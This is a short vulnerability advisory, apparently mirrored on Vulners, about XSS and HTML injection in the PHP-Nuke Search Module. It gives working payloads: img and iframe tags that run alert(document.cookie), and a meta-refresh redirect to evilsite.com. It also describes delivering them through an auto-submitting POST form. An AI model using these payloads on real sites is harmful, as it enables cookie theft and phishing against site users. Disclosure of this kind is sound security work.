Vulners
Lucene search
phpnukesearch-xss.txt
`PHP-Nuke ALL versions Search Module multiple XSS and HTML injection
-------------------------------------------------------------------
The well-known PHP-Nuke CMS is vulnerable to multiple XSS attacks and HTML injections through the Search Module.
The request is made using POST, but the whole process can be automatized creating an ad-hoc page to send to the victim with an auto-submitting forum using POST as method and the vulnerable URL (http://vulnsite.com/modules.php?name=Search) as ACTION.
Both the XSS and the HTML injection work on IE 6/7 and Firefox (ALL versions), with every server and php.ini configuration.
You may use the following queries for testing.
*XSS*:
<img src=http://www.microsoft.com/404.jpg style=display:none onerror=XSS_HERE <
<iframe src=http://www.google.com style=display:none onload=XSS_HERE <
For example:
<img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
<iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <
*HTML injection*:
Examples:
<meta http-equiv=refresh content=1;url=http://evilsite.com <
Obviosuly, using XSS a malicious hacker can obtain some sensitive and confidential information like cookies, or set up a phishing attack.
Mikispag
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4